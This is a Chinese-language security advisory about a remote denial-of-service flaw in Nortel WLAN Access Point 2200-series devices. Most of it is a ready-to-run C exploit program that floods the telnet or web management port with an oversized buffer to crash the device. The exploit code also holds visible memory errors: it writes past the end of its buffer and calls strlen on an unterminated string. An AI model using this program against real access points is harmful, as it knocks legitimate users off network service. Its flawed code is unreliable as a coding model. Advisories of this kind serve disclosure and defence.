首页 -> 安全研究
安全研究
安全漏洞
Nortel Wireless LAN Access Point 2200系列远程拒绝服务攻击漏洞
发布日期:2004-03-02
更新日期:2004-03-08
受影响系统:
Nortel Networks WLAN Access Point 2225描述:
Nortel Networks WLAN Access Point 2221
Nortel Networks WLAN Access Point 2220
BUGTRAQ ID: 9787
Nortel Wireless LAN Access Point 2200系列是无线接入设备。
Nortel Wireless LAN Access Point 2200系列在处理超大网络请求时处理不正确,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
LAN AP 2200允许客户端服务器之间的任意通信,LAN使用默认23和80口进行管理。攻击者提交超大网络请求给无线LAN访问接入设备的默认管理服务进行处理,可导致无线接入服务崩溃,停止对其他正常用户的响应。
<*来源:Alex Hernandez (al3xhernandez@ureach.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* WLAN-DoS.c
*
* Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
* discovered by Alex Hernandez.
*
* Copyright (C) 2004 Alex Hernandez.
*
* A successful attack on a vulnerable server can cause the AP
* (Access Point) listener to fail and crash. The port 23 (telnet)
* functionality cannot be restored until the listener is manually restarted.
*
* LAN AP 2200 permits client-server communication across any network.
* LAN enables by default the port 23 (telnet) and port (80) for administering.
* Debugging features are enabled by default, if LAN AP encounters such a request,
* it will crash and no longer field AP requests from authorized clients.
*
* Simple lame code by
*
* -Mark Ludwik :Germany
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
printf("Usage: WlanDoS [AP/Host] [port]\n\n");
exit(-1);
}
int sock;
char explbuf[2024];
struct sockaddr_in dest;
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;
printf("[+] Exploit buffer.\n");
memset(explbuf, 'A', 2024);
memcpy(explbuf+2024, "\n\n\n\n\n\n\n\n", 8);
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
perror("connect()");
exit(-1);
}
printf("[+] Connected...\n");
printf("[+] Sending DoS attack...!\n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("\n[+] Crash was successful !\n");
return(0);
}
建议:
厂商补丁:
Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nortelnetworks.com/index.html
浏览次数:3060
严重程度:0(网友投票)
绿盟科技给您安全的保障